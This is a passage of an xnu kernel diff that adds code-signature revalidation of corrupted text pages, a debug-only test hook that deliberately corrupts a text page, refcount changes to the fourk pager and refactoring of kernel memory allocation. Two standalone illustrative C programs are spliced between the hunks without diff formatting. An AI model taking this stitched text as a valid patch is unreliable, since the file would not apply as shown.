+                       }
+
+                       /*
+                        * If this page is busy, we need to wait for it.
+                        */
+                       if (page->vmp_busy) {
+                               PAGE_SLEEP(object, page, TRUE);
+                               vm_object_unlock(object);
+                               goto restart;
+                       }
+                       break;
+               }
+
+               /*
+                * If the object doesn't have the page and
+                * has no shadow, then we can quit.
+                */
+               shadow = object->shadow;
+               if (shadow == NULL) {
+                       kr = KERN_FAILURE;
+                       goto done;
+               }
+
+               /*
+                * Move to the next object
+                */
+               offset += object->vo_shadow_offset;
+               vm_object_lock(shadow);
+               vm_object_unlock(object);
+               object = shadow;
+               shadow = VM_OBJECT_NULL;
+       }
+       *ret_object = object;
+       *ret_offset = vm_object_trunc_page(offset);
+       *ret_page = page;
+
+done:
+       if (kr != KERN_SUCCESS && object != NULL) {
+               vm_object_unlock(object);
+       }
+       return kr;
+}
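A toy sketch of the shadow-chain walk performed by the loop above: if the current object has no resident page at the offset, add the shadow offset and move to the backing object, until a page is found or the chain ends. All structures and helpers here are illustrative stand-ins, not xnu types:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative stand-ins for vm_object_t / vm_page_t (toy types only). */
struct toy_page { uint64_t offset; };
struct toy_object {
        struct toy_object *shadow;         /* backing object, or NULL          */
        uint64_t           shadow_offset;  /* offset of this object in shadow  */
        struct toy_page   *pages;          /* trivial "resident page" array    */
        size_t             npages;
};

static struct toy_page *
toy_page_lookup(struct toy_object *obj, uint64_t offset)
{
        for (size_t i = 0; i < obj->npages; i++) {
                if (obj->pages[i].offset == offset) {
                        return &obj->pages[i];
                }
        }
        return NULL;
}

/* Walk the shadow chain, mirroring the loop in vmtc_revalidate_lookup(). */
static struct toy_page *
toy_shadow_chain_lookup(struct toy_object *obj, uint64_t offset)
{
        while (obj != NULL) {
                struct toy_page *page = toy_page_lookup(obj, offset);
                if (page != NULL) {
                        return page;
                }
                offset += obj->shadow_offset;   /* translate into the backing object */
                obj = obj->shadow;
        }
        return NULL;    /* no object in the chain has the page */
}

int
main(void)
{
        struct toy_page backing_pages[] = { { .offset = 0x3000 } };
        struct toy_object backing = { NULL, 0, backing_pages, 1 };
        struct toy_object top = { &backing, 0x1000, NULL, 0 };

        /* offset 0x2000 in "top" resolves to 0x3000 in "backing" */
        printf("found: %d\n", toy_shadow_chain_lookup(&top, 0x2000) != NULL);
        return 0;
}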
+
+/*
+ * Check if a page is wired; this needs the page queues lock.
+ */
+static bool
+is_page_wired(vm_page_t page)
+{
+       bool result;
+       vm_page_lock_queues();
+       result = VM_PAGE_WIRED(page);
+       vm_page_unlock_queues();
+       return result;
+}
+
+/*
+ * A fatal process error has occurred in the given task.
+ * Recheck the code signing of the text page at the given
+ * address to check for a text page corruption.
+ *
+ * Returns KERN_FAILURE if a page was found to be corrupt
+ * by failing to match its code signature. KERN_SUCCESS
+ * means the page is either valid or we don't have the
+ * information to say it's corrupt.
+ */
+kern_return_t
+revalidate_text_page(task_t task, vm_map_offset_t code_addr)
+{
+       kern_return_t          kr;
+       vm_map_t               map;
+       vm_object_t            object = NULL;
+       vm_object_offset_t     offset;
+       vm_page_t              page = NULL;
+       struct vnode           *vnode;
+       bool                   do_invalidate = false;
+       uint64_t               *diagnose_buffer = NULL;
+
+       map = task->map;
+       if (task->map == NULL) {
+               return KERN_SUCCESS;
+       }
+
+       kr = vmtc_revalidate_lookup(map, code_addr, &object, &offset, &page);
+       if (kr != KERN_SUCCESS) {
+               goto done;
+       }
+
+       /*
+        * The object needs to have a pager.
+        */
+       if (object->pager == NULL) {
+               goto done;
+       }
+
+       /*
+        * Needs to be a vnode backed page to have a signature.
+        */
+       vnode = vnode_pager_lookup_vnode(object->pager);
+       if (vnode == NULL) {
+               goto done;
+       }
+
+       /*
+        * Object checks to see if we should proceed.
+        */
+       if (!object->code_signed ||     /* no code signature to check */
+           object->internal ||         /* internal objects aren't signed */
+           object->terminating ||      /* the object and its pages are already going away */
+           !object->pager_ready) {     /* this shouldn't happen, but the check doesn't hurt */
+               goto done;
+       }
+
+       /*
+        * Check the code signature of the page in question.
+        */
+       vm_page_map_and_validate_cs(object, page);
+
+       /*
+        * At this point:
+        * vmp_cs_validated |= validated (set if a code signature exists)
+        * vmp_cs_tainted |= tainted (set if code signature violation)
+        * vmp_cs_nx |= nx;  ??
+        *
+        * if vmp_pmapped then have to pmap_disconnect..
+        * other flags to check on object or page?
+        */
+       if (page->vmp_cs_tainted != VMP_CS_ALL_FALSE) {
+#if DEBUG || DEVELOPMENT
+               /*
+                * On development builds, a boot-arg can be used to cause
+                * a panic, instead of a quiet repair.
+                */
+               if (vmtc_panic_instead) {
+                       panic("Text page corruption detected: vm_page_t 0x%llx\n", (long long)(uintptr_t)page);
+               }
+#endif /* DEBUG || DEVELOPMENT */
+
+               /*
+                * We're going to invalidate this page. Mark it as busy so we can
+                * drop the object lock and use copyin() to save its contents.
+                */
+               do_invalidate = true;
+               assert(!page->vmp_busy);
+               page->vmp_busy = TRUE;
+               vm_object_unlock(object);
+               diagnose_buffer = vmtc_text_page_diagnose_setup(code_addr);
+       }
+
+done:
+       if (do_invalidate) {
+               vm_object_lock(object);
+               assert(page->vmp_busy);
+               assert(VM_PAGE_OBJECT(page) == object);      /* Since the page was busy, this shouldn't change */
+               assert(page->vmp_offset == offset);
+               PAGE_WAKEUP_DONE(page);                      /* make no longer busy */
+
+               /*
+                * Invalidate, i.e. toss, the corrupted page.
+                */
+               if (!page->vmp_cleaning &&
+                   !page->vmp_laundry &&
+                   !page->vmp_fictitious &&
+                   !page->vmp_precious &&
+                   !page->vmp_absent &&
+                   !page->vmp_error &&
+                   !page->vmp_dirty &&
+                   !is_page_wired(page)) {
+                       if (page->vmp_pmapped) {
+                               int refmod = pmap_disconnect(VM_PAGE_GET_PHYS_PAGE(page));
+                               if (refmod & VM_MEM_MODIFIED) {
+                                       SET_PAGE_DIRTY(page, FALSE);
+                               }
+                               if (refmod & VM_MEM_REFERENCED) {
+                                       page->vmp_reference = TRUE;
+                               }
+                       }
+                       /* If the page seems intentionally modified, don't trash it. */
+                       if (!page->vmp_dirty) {
+                               VM_PAGE_FREE(page);
+                       } else {
+                               (void)OSAddAtomic(1, &vmtc_not_eligible);
+                       }
+               } else {
+                       (void)OSAddAtomic(1, &vmtc_not_eligible);
+               }
+               vm_object_unlock(object);
+
+               /*
+                * Now try to diagnose the type of failure by faulting
+                * in a new copy and diff'ing it with what we saved.
+                */
+               if (diagnose_buffer) {
+                       vmtc_text_page_diagnose(code_addr, diagnose_buffer);
+               }
+               return KERN_FAILURE;
+       }
+
+       if (object != NULL) {
+               vm_object_unlock(object);
+       }
+       return KERN_SUCCESS;
+}
+
+#if DEBUG || DEVELOPMENT
+/*
+ * For implementing unit tests - ask the pmap to corrupt a text page.
+ * We have to find the page, to get the physical address, then invoke
+ * the pmap.
+ */
+extern kern_return_t vm_corrupt_text_addr(uintptr_t);
+
+kern_return_t
+vm_corrupt_text_addr(uintptr_t va)
+{
+       task_t                 task = current_task();
+       vm_map_t               map;
+       kern_return_t          kr = KERN_SUCCESS;
+       vm_object_t            object = VM_OBJECT_NULL;
+       vm_object_offset_t     offset;
+       vm_page_t              page = NULL;
+       pmap_paddr_t           pa;
+
+       map = task->map;
+       if (task->map == NULL) {
+               printf("corrupt_text_addr: no map\n");
+               return KERN_FAILURE;
+       }
+
+       kr = vmtc_revalidate_lookup(map, (vm_map_offset_t)va, &object, &offset, &page);
+       if (kr != KERN_SUCCESS) {
+               printf("corrupt_text_addr: page lookup failed\n");
+               return kr;
+       }
+       /* get the physical address to use */
+       pa = ptoa(VM_PAGE_GET_PHYS_PAGE(page)) + (va - vm_object_trunc_page(va));
+
+       /*
+        * Check we have something we can work with.
+        * Due to racing with pageout as we enter the sysctl,
+        * it's theoretically possible to have the page disappear, just
+        * before the lookup.
+        *
+        * That's not likely to happen often, but I've filed radar 72857482
+        * to bubble up the error here to the sysctl result and have the
+        * test not FAIL in that case.
+        */
+       if (page->vmp_busy) {
+               printf("corrupt_text_addr: vmp_busy\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_cleaning) {
+               printf("corrupt_text_addr: vmp_cleaning\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_laundry) {
+               printf("corrupt_text_addr: vmp_laundry\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_fictitious) {
+               printf("corrupt_text_addr: vmp_fictitious\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_precious) {
+               printf("corrupt_text_addr: vmp_precious\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_absent) {
+               printf("corrupt_text_addr: vmp_absent\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_error) {
+               printf("corrupt_text_addr: vmp_error\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_dirty) {
+               printf("corrupt_text_addr: vmp_dirty\n");
+               kr = KERN_FAILURE;
+       }
+       if (is_page_wired(page)) {
+               printf("corrupt_text_addr: wired\n");
+               kr = KERN_FAILURE;
+       }
+       if (!page->vmp_pmapped) {
+               printf("corrupt_text_addr: !vmp_pmapped\n");
+               kr = KERN_FAILURE;
+       }
+
+       if (kr == KERN_SUCCESS) {
+               printf("corrupt_text_addr: using physaddr 0x%llx\n", (long long)pa);
+               kr = pmap_test_text_corruption(pa);
+               if (kr != KERN_SUCCESS) {
+                       printf("corrupt_text_addr: pmap error %d\n", kr);
+               }
+       } else {
+               printf("corrupt_text_addr: object %p\n", object);
+               printf("corrupt_text_addr: offset 0x%llx\n", (uint64_t)offset);
+               printf("corrupt_text_addr: va 0x%llx\n", (uint64_t)va);
+               printf("corrupt_text_addr: vm_object_trunc_page(va) 0x%llx\n", (uint64_t)vm_object_trunc_page(va));
+               printf("corrupt_text_addr: vm_page_t %p\n", page);
+               printf("corrupt_text_addr: ptoa(PHYS_PAGE) 0x%llx\n", (uint64_t)ptoa(VM_PAGE_GET_PHYS_PAGE(page)));
+               printf("corrupt_text_addr: using physaddr 0x%llx\n", (uint64_t)pa);
+       }
+
+       if (object != VM_OBJECT_NULL) {
+               vm_object_unlock(object);
+       }
+       return kr;
+}
+#endif /* DEBUG || DEVELOPMENT */
index 73bfa3a244f40091447777c6788011a2e8a9b2fe..d815d85a38f3700da2b1a9d64884c46bf3f2f586 100644 (file)
@@ -149,9 +149,13 @@ typedef struct fourk_pager {
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       unsigned int            ref_count;      /* reference count */
-       int     is_ready;       /* is this pager ready ? */
-       int     is_mapped;      /* is this mem_obj mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define fourk_pgr_hdr_ref       fourk_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         fourk_pgr_hdr_ref;
+#endif
+       bool    is_ready;       /* is this pager ready ? */
+       bool    is_mapped;      /* is this mem_obj mapped ? */
        struct fourk_pager_backing slots[FOURK_PAGER_SLOTS]; /* backing for each
                                                              *  4K-chunk */
 } *fourk_pager_t;
@@ -322,8 +326,7 @@ fourk_pager_reference(
        pager = fourk_pager_lookup(mem_obj);
 
        lck_mtx_lock(&fourk_pager_lock);
-       assert(pager->ref_count > 0);
-       pager->ref_count++;
+       os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&fourk_pager_lock);
 }
 
@@ -401,6 +404,7 @@ fourk_pager_deallocate_internal(
 {
        boolean_t       needs_trimming;
        int             count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&fourk_pager_lock);
@@ -416,9 +420,9 @@ fourk_pager_deallocate_internal(
        }
 
        /* drop a reference on this pager */
-       pager->ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
 
-       if (pager->ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -428,7 +432,7 @@ fourk_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&fourk_pager_lock);
                fourk_pager_terminate_internal(pager);
-       } else if (pager->ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -519,7 +523,7 @@ fourk_pager_map(
 
        lck_mtx_lock(&fourk_pager_lock);
        assert(pager->is_ready);
-       assert(pager->ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -527,7 +531,7 @@ fourk_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               pager->ref_count++;
+               os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
                fourk_pager_count_mapped++;
        }
        lck_mtx_unlock(&fourk_pager_lock);
@@ -586,7 +590,7 @@ fourk_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &fourk_pager_ops);
        pager = (fourk_pager_t) mem_obj;
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -616,7 +620,7 @@ fourk_pager_trim(void)
                prev_pager = (fourk_pager_t)
                    queue_prev(&pager->pager_queue);
 
-               if (pager->ref_count == 2 &&
+               if (os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2 &&
                    pager->is_ready &&
                    !pager->is_mapped) {
                        /* this pager can be trimmed */
@@ -652,13 +656,13 @@ fourk_pager_trim(void)
                    pager_queue);
                pager->pager_queue.next = NULL;
                pager->pager_queue.prev = NULL;
-               assert(pager->ref_count == 2);
+               assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2);
                /*
                 * We can't call deallocate_internal() because the pager
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               pager->ref_count--;
+               (void)os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL);
                fourk_pager_terminate_internal(pager);
        }
 }
@@ -680,7 +684,7 @@ fourk_pager_to_vm_object(
                return VM_OBJECT_NULL;
        }
 
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL);
        object = memory_object_control_to_vm_object(pager->fourk_pgr_hdr.mo_control);
        assert(object != VM_OBJECT_NULL);
@@ -718,8 +722,8 @@ fourk_pager_create(void)
        pager->fourk_pgr_hdr.mo_pager_ops = &fourk_pager_ops;
        pager->fourk_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
-       pager->ref_count = 2;   /* existence + setup reference */
-       pager->is_ready = FALSE;/* not ready until it has a "name" */
+       os_ref_init_count_raw(&pager->fourk_pgr_hdr_ref, NULL, 2); /* existence + setup reference */
+       pager->is_ready = FALSE; /* not ready until it has a "name" */
        pager->is_mapped = FALSE;
 
        for (i = 0; i < FOURK_PAGER_SLOTS; i++) {
@@ -792,7 +796,7 @@ fourk_pager_data_request(
 
        pager = fourk_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(pager->ref_count > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("fourk_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -821,7 +825,7 @@ fourk_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
 #if __x86_64__ || __arm__ || __arm64__
@@ -1289,7 +1293,7 @@ fourk_pager_populate(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0);
        assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL);
 
        if (index < 0 || index > FOURK_PAGER_SLOTS) {
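The fourk pager changes above replace a hand-maintained ref_count integer with the os_refcnt API, where a release returns the new count so callers can act on the 1 ("named reference only") and 0 ("terminated") transitions. A portable analogue of that pattern, sketched with C11 atomics (this is not <os/refcnt.h>):

/*
 * Portable analogue (illustrative only) of the retain/release pattern the
 * fourk pager diff switches to: release returns the new count so the caller
 * can react to the 1 -> "named only" and 0 -> "terminated" transitions, as
 * fourk_pager_deallocate_internal() does.
 */
#include <assert.h>
#include <stdatomic.h>
#include <stdio.h>

typedef atomic_uint toy_ref_t;

static void
toy_ref_init(toy_ref_t *ref, unsigned count)
{
        atomic_init(ref, count);
}

static void
toy_ref_retain(toy_ref_t *ref)
{
        unsigned old = atomic_fetch_add(ref, 1);
        assert(old > 0);                /* retaining a dead object is a bug */
}

static unsigned
toy_ref_release(toy_ref_t *ref)
{
        unsigned old = atomic_fetch_sub(ref, 1);
        assert(old > 0);                /* over-release is a bug */
        return old - 1;                 /* new count, as the diff's callers expect */
}

int
main(void)
{
        toy_ref_t ref;
        toy_ref_init(&ref, 2);          /* existence + setup reference */
        toy_ref_retain(&ref);           /* e.g. the first mapping takes a reference */
        (void)toy_ref_release(&ref);
        if (toy_ref_release(&ref) == 1) {
                printf("only the named reference is left\n");
        }
        return 0;
}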
index 8bd9c2378c32b96fa7320d3e5423a62a93185966..11ef72463244ff291528812a4fa511c984596745 100644 (file)
@@ -87,9 +87,6 @@ const vm_offset_t vm_max_kernel_address = VM_MAX_KERNEL_ADDRESS;
 TUNABLE(bool, iokit_iomd_setownership_enabled,
     "iokit_iomd_setownership_enabled", true);
 
-vm_offset_t kmapoff_kaddr;
-unsigned int kmapoff_pgcnt;
-
 static inline void
 vm_mem_bootstrap_log(const char *message)
 {
@@ -105,7 +102,7 @@ __startup_func
 void
 vm_mem_bootstrap(void)
 {
-       vm_offset_t     start, end;
+       vm_offset_t start, end, kmapoff_kaddr;
 
        /*
         *      Initializes resident memory structures.
@@ -125,6 +122,8 @@ vm_mem_bootstrap(void)
        vm_mem_bootstrap_log("vm_object_bootstrap");
        vm_object_bootstrap();
 
+       vm_retire_boot_pages();
+
        kernel_startup_initialize_upto(STARTUP_SUB_VM_KERNEL);
 
        vm_mem_bootstrap_log("vm_map_init");
@@ -144,10 +143,11 @@ vm_mem_bootstrap(void)
         * pointer packing schemes using KERNEL_PMAP_HEAP_RANGE_START as a base
         * do not admit this address to be part of any zone submap.
         */
-       kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */
-       if (vm_allocate_kernel(kernel_map, &kmapoff_kaddr,
-           kmapoff_pgcnt * PAGE_SIZE_64, VM_FLAGS_ANYWHERE, VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) {
-               panic("cannot vm_allocate %u kernel_map pages", kmapoff_pgcnt);
+       uint32_t kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */
+       if (kernel_memory_allocate(kernel_map, &kmapoff_kaddr,
+           ptoa(kmapoff_pgcnt), 0, KMA_KOBJECT | KMA_PERMANENT | KMA_VAONLY,
+           VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) {
+               panic("cannot kernel_memory_allocate %u pages", kmapoff_pgcnt);
        }
 
        vm_mem_bootstrap_log("pmap_init");
index 8abf0275c4e5673741261e08195e328ddcd75766..51dd4fe46b4195c887721650b2bda31d7747c446 100644 (file)
@@ -111,7 +111,7 @@ kmem_alloc_contig(
        vm_offset_t             mask,
        ppnum_t                 max_pnum,
        ppnum_t                 pnum_mask,
-       int                     flags,
+       kma_flags_t             flags,
        vm_tag_t                tag)
 {
        vm_object_t             object;
@@ -252,8 +252,8 @@ kernel_memory_allocate(
        vm_offset_t     *addrp,
        vm_size_t       size,
        vm_offset_t     mask,
-       int                     flags,
-       vm_tag_t                tag)
+       kma_flags_t     flags,
+       vm_tag_t        tag)
 {
        vm_object_t             object;
        vm_object_offset_t      offset;
@@ -268,14 +268,9 @@ kernel_memory_allocate(
        vm_page_t               wired_page_list = NULL;
        int                     guard_page_count = 0;
        int                     wired_page_count = 0;
-       int                     page_grab_count = 0;
-       int                     i;
        int                     vm_alloc_flags;
        vm_map_kernel_flags_t   vmk_flags;
        vm_prot_t               kma_prot;
-#if DEVELOPMENT || DEBUG
-       task_t                                  task = current_task();
-#endif /* DEVELOPMENT || DEBUG */
 
        if (startup_phase < STARTUP_SUB_KMEM) {
                panic("kernel_memory_allocate: VM is not ready");
@@ -349,64 +344,25 @@ kernel_memory_allocate(
        assert(wired_page_count * PAGE_SIZE_64 == fill_size);
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0);
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
 #endif
 
-       for (i = 0; i < guard_page_count; i++) {
-               for (;;) {
-                       mem = vm_page_grab_guard();
-
-                       if (mem != VM_PAGE_NULL) {
-                               break;
-                       }
-                       if (flags & KMA_NOPAGEWAIT) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       vm_page_more_fictitious();
+       for (int i = 0; i < guard_page_count; i++) {
+               mem = vm_page_grab_guard((flags & KMA_NOPAGEWAIT) == 0);
+               if (mem == VM_PAGE_NULL) {
+                       kr = KERN_RESOURCE_SHORTAGE;
+                       goto out;
                }
                mem->vmp_snext = guard_page_list;
                guard_page_list = mem;
        }
 
        if (!(flags & (KMA_VAONLY | KMA_PAGEABLE))) {
-               for (i = 0; i < wired_page_count; i++) {
-                       for (;;) {
-                               if (flags & KMA_LOMEM) {
-                                       mem = vm_page_grablo();
-                               } else {
-                                       mem = vm_page_grab();
-                               }
-
-                               if (mem != VM_PAGE_NULL) {
-                                       break;
-                               }
-
-                               if (flags & KMA_NOPAGEWAIT) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-                               if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-
-                               /* VM privileged threads should have waited in vm_page_grab() and not get here. */
-                               assert(!(current_thread()->options & TH_OPT_VMPRIV));
-
-                               uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE;
-                               if (unavailable > max_mem || map_size > (max_mem - unavailable)) {
-                                       kr = KERN_RESOURCE_SHORTAGE;
-                                       goto out;
-                               }
-                               VM_PAGE_WAIT();
-                       }
-                       page_grab_count++;
-                       if (KMA_ZERO & flags) {
-                               vm_page_zero_fill(mem);
-                       }
-                       mem->vmp_snext = wired_page_list;
-                       wired_page_list = mem;
+               kr = vm_page_alloc_list(wired_page_count, flags,
+                   &wired_page_list);
+               if (kr != KERN_SUCCESS) {
+                       goto out;
                }
        }
 
@@ -580,12 +536,9 @@ kernel_memory_allocate(
        }
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           wired_page_count, 0, 0, 0);
 #endif
-
        /*
         *      Return the memory, not zeroed.
         */
@@ -602,141 +555,32 @@ out:
        }
 
 #if DEBUG || DEVELOPMENT
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-       if (task != NULL && kr == KERN_SUCCESS) {
-               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           wired_page_count, 0, 0, 0);
 #endif
-
        return kr;
 }
 
-kern_return_t
-kernel_memory_populate(
+void
+kernel_memory_populate_with_pages(
        vm_map_t        map,
        vm_offset_t     addr,
        vm_size_t       size,
-       int             flags,
+       vm_page_t       page_list,
+       kma_flags_t     flags,
        vm_tag_t        tag)
 {
-       vm_object_t             object;
-       vm_object_offset_t      offset, pg_offset;
-       kern_return_t           kr, pe_result;
-       vm_page_t               mem;
-       vm_page_t               page_list = NULL;
-       int                     page_count = 0;
-       int                     page_grab_count = 0;
-       int                     i;
-
-#if DEBUG || DEVELOPMENT
-       task_t                                  task = current_task();
-       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0);
-#endif
-
-       page_count = (int) (size / PAGE_SIZE_64);
-
-       assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT));
+       vm_object_t     object;
+       kern_return_t   pe_result;
+       vm_page_t       mem;
+       int             page_count = atop_64(size);
 
        if (flags & KMA_COMPRESSOR) {
-               pg_offset = page_count * PAGE_SIZE_64;
-
-               do {
-                       for (;;) {
-                               mem = vm_page_grab();
-
-                               if (mem != VM_PAGE_NULL) {
-                                       break;
-                               }
-
-                               VM_PAGE_WAIT();
-                       }
-                       page_grab_count++;
-                       if (KMA_ZERO & flags) {
-                               vm_page_zero_fill(mem);
-                       }
-                       mem->vmp_snext = page_list;
-                       page_list = mem;
-
-                       pg_offset -= PAGE_SIZE_64;
-
-                       kr = pmap_enter_options(kernel_pmap,
-                           addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem),
-                           VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE,
-                           PMAP_OPTIONS_INTERNAL, NULL);
-                       assert(kr == KERN_SUCCESS);
-               } while (pg_offset);
-
-               offset = addr;
-               object = compressor_object;
-
-               vm_object_lock(object);
-
-               for (pg_offset = 0;
-                   pg_offset < size;
-                   pg_offset += PAGE_SIZE_64) {
-                       mem = page_list;
-                       page_list = mem->vmp_snext;
-                       mem->vmp_snext = NULL;
-
-                       vm_page_insert(mem, object, offset + pg_offset);
-                       assert(mem->vmp_busy);
-
-                       mem->vmp_busy = FALSE;
-                       mem->vmp_pmapped = TRUE;
-                       mem->vmp_wpmapped = TRUE;
-                       mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR;
-               }
-               vm_object_unlock(object);
-
-#if KASAN
-               if (map == compressor_map) {
-                       kasan_notify_address_nopoison(addr, size);
-               } else {
-                       kasan_notify_address(addr, size);
-               }
-#endif
-
-#if DEBUG || DEVELOPMENT
-               VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0);
-               if (task != NULL) {
-                       ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
-               }
-#endif
-               return KERN_SUCCESS;
+               panic("%s(%p,0x%llx,0x%llx,0x%x): KMA_COMPRESSOR", __func__,
+                   map, (uint64_t) addr, (uint64_t) size, flags);
        }
 
-       for (i = 0; i < page_count; i++) {
-               for (;;) {
-                       if (flags & KMA_LOMEM) {
-                               mem = vm_page_grablo();
-                       } else {
-                               mem = vm_page_grab();
-                       }
-
-                       if (mem != VM_PAGE_NULL) {
-                               break;
-                       }
-
-                       if (flags & KMA_NOPAGEWAIT) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       if ((flags & KMA_LOMEM) &&
-                           (vm_lopage_needed == TRUE)) {
-                               kr = KERN_RESOURCE_SHORTAGE;
-                               goto out;
-                       }
-                       VM_PAGE_WAIT();
-               }
-               page_grab_count++;
-               if (KMA_ZERO & flags) {
-                       vm_page_zero_fill(mem);
-               }
-               mem->vmp_snext = page_list;
-               page_list = mem;
-       }
        if (flags & KMA_KOBJECT) {
-               offset = addr;
                object = kernel_object;
 
                vm_object_lock(object);
@@ -749,16 +593,15 @@ kernel_memory_populate(
                 *      take reference on object;
                 *      unlock map;
                 */
-               panic("kernel_memory_populate(%p,0x%llx,0x%llx,0x%x): "
-                   "!KMA_KOBJECT",
+               panic("%s(%p,0x%llx,0x%llx,0x%x): !KMA_KOBJECT", __func__,
                    map, (uint64_t) addr, (uint64_t) size, flags);
        }
 
-       for (pg_offset = 0;
+       for (vm_object_offset_t pg_offset = 0;
            pg_offset < size;
            pg_offset += PAGE_SIZE_64) {
                if (page_list == NULL) {
-                       panic("kernel_memory_populate: page_list == NULL");
+                       panic("%s: page_list too short", __func__);
                }
 
                mem = page_list;
@@ -768,11 +611,11 @@ kernel_memory_populate(
                assert(mem->vmp_q_state == VM_PAGE_NOT_ON_Q);
                mem->vmp_q_state = VM_PAGE_IS_WIRED;
                mem->vmp_wire_count++;
-               if (__improbable(mem->vmp_wire_count == 0)) {
-                       panic("kernel_memory_populate(%p): wire_count overflow", mem);
+               if (mem->vmp_wire_count == 0) {
+                       panic("%s(%p): wire_count overflow", __func__, mem);
                }
 
-               vm_page_insert_wired(mem, object, offset + pg_offset, tag);
+               vm_page_insert_wired(mem, object, addr + pg_offset, tag);
 
                mem->vmp_busy = FALSE;
                mem->vmp_pmapped = TRUE;
@@ -799,23 +642,19 @@ kernel_memory_populate(
                assert(pe_result == KERN_SUCCESS);
 
                if (flags & KMA_NOENCRYPT) {
-                       bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE);
+                       __nosan_bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE);
